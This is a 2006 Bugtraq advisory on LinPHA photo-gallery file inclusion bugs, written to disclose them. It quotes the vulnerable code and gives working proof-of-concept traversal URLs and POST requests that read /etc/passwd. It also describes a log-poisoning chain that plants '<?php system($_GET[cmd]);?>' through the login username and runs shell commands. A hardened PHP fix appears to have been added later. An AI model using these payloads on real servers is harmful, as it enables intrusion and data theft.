Message-ID: <20060211115432.21430.qmail@securityfocus.com>
Date: 11 Feb 2006 11:54:32 -0000
From: rgod@...istici.org
To: bugtraq@...urityfocus.com
Subject: Linpha <= 1.0 multiple arbitrary local inclusion


------------- Linpha <= 1.0 multiple arbitrary local inclusion -----------------

software:
site: http://linpha.sourceforge.net/nuke/
description: "LinPHA is an easy to use, multilingual, flexible photo / image
archive / album / gallery written in PHP. It uses a SQL database to store
information about your pictures."
--------------------------------------------------------------------------------

i)
vulnerable code in docs/index.php at lines 28 - 41:

...
if(isset($_GET['lang']))	// come from install pages
{
	$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
	include_once(TOP_DIR.'/functions/db_api.php');
	$include_lang = get_language();
}
else
{
	$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
...

well, $_GET['lang'] goes unfiltered into the include path, so you can include an arbitrary php file from local resources, poc:

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../../test

and, if magic_quotes_gpc = Off (the %00 null byte is not escaped and truncates the path before the '.php' suffix), any file:

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00

--------------------------------------------------------------------------------
ii) the install directory is not removed after installation; you cannot use its files to
modify settings, but there are arbitrary local inclusion issues in several of them:

      --------------------------------------------------------------------------
ii.a) vulnerable code in install/install.php at lines 26-36:

...
if (@$_GET['language']) {
	$lang=$_GET['language'];
} else if (@$_POST['language']) {
	$lang=$_POST['language'];
} else if ($http_accept_lang) {
  $lang = $http_accept_lang;
} else {
	$lang="English";
}

include_once(TOP_DIR.'/lang/lang.'.$lang.'.php');
...

poc:

http://[target]/[path]/install/install.php?language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/install.php?language=/../../sql/tmp/linpha.log%00

      --------------------------------------------------------------------------
ii.b) vulnerable code in install/sec_stage_install.php at lines 22-31:

...
switch($_GET['whatlang'])
{
case 1:
	include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
	break;

default:
	include_once(TOP_DIR.'/lang/lang.English.php');
	break;
}
...

poc:

http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../etc/passwd%00

      --------------------------------------------------------------------------
ii.c) vulnerable code in install/third_stage_install.php at line 22:

...
include_once(TOP_DIR.'/lang/lang.'.$_GET['language'].'.php');
...

poc:

http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../etc/passwd%00

      --------------------------------------------------------------------------
ii.d) vulnerable code in install/forth_stage_install.php at line 22:

...
include_once(TOP_DIR.'/lang/lang.'.$_POST['language'].'.php');
...

poc:

POST [path]install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test

if magic_quotes_gpc = Off:

POST [path]install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: Sun-Tzu
Connection: Close

language=/../../../../../../../../etc/passwd%00

--------------------------------------------------------------------------------
iii) if "user login events log" is set to "file" in the Linpha administration
(not the default), a remote user can inject arbitrary code into sql/tmp/linpha.log

poc: try to login with username: <?php system($_GET[cmd]);?>
and password: [whatever]

now in sql/tmp/linpha.log we have something like this:

USER | ERROR | 20060211 035519 | 192.168.1.5 | User <?php system($_GET[cmd]);?>: login failed!

now, if magic_quotes_gpc = Off on the target system, you can launch operating system
commands through the inclusion bug from i), poc:

http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00

(same technique with install dir scripts...)
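Every issue above (i, ii.a-ii.d, and the log-poisoning chain in iii) comes from the same pattern: a request parameter is concatenated into the include path. The following is an added example of a hardened replacement for that pattern, written for this note and not LinPHA's own code; it assumes TOP_DIR is defined by the caller as in the original files and that the function names are hypothetical.

```php
<?php
// Hardened replacement for include_once(TOP_DIR.'/lang/lang.'.$x.'.php').
// Requires PHP 7.1+ for the nullable type hints.

/**
 * Return the absolute path of an installed language file, or null when
 * $requested is not the name of a language that actually ships in lang/.
 */
function resolve_lang_file(string $topDir, string $requested): ?string
{
    // 1. Syntactic allowlist: a language name is letters only. This rejects
    //    '/', '.', and NUL bytes, so "../" traversal and "%00" truncation
    //    never reach the filesystem, whatever magic_quotes_gpc is set to.
    if (!preg_match('/\A[A-Za-z]{1,32}\z/', $requested)) {
        return null;
    }
    $langDir = realpath($topDir . '/lang');
    if ($langDir === false) {
        return null;
    }
    // 2. Existence check against the real lang/ directory: only files that
    //    are installed there can be selected, never sql/tmp/linpha.log.
    $candidate = $langDir . DIRECTORY_SEPARATOR . 'lang.' . $requested . '.php';
    $resolved = realpath($candidate);
    if ($resolved === false || !is_file($resolved)) {
        return null;
    }
    // 3. Containment check: the resolved path must still live under lang/.
    $prefix = $langDir . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

function load_language(string $topDir, ?string $requested, string $fallback = 'English'): void
{
    $file = $requested !== null ? resolve_lang_file($topDir, $requested) : null;
    if ($file === null) {
        // Unknown or malformed name: fall back to the default language
        // instead of echoing the raw input into an include path.
        $file = resolve_lang_file($topDir, $fallback);
    }
    if ($file === null) {
        throw new RuntimeException('No usable language file under ' . $topDir . '/lang');
    }
    include_once $file;
}

// Hypothetical call site replacing the block in docs/index.php:
// load_language(TOP_DIR, $_GET['lang'] ?? null);
```

The same call replaces the include in each install/*_install.php script; with the include no longer attacker-controlled, the PHP tags written to sql/tmp/linpha.log in iii) are never executed, although the logger should still strip control characters and NUL bytes from the username before writing it.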

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici org
original advisory: http://retrogod.altervista.org/linpha_10_local.html
--------------------------------------------------------------------------------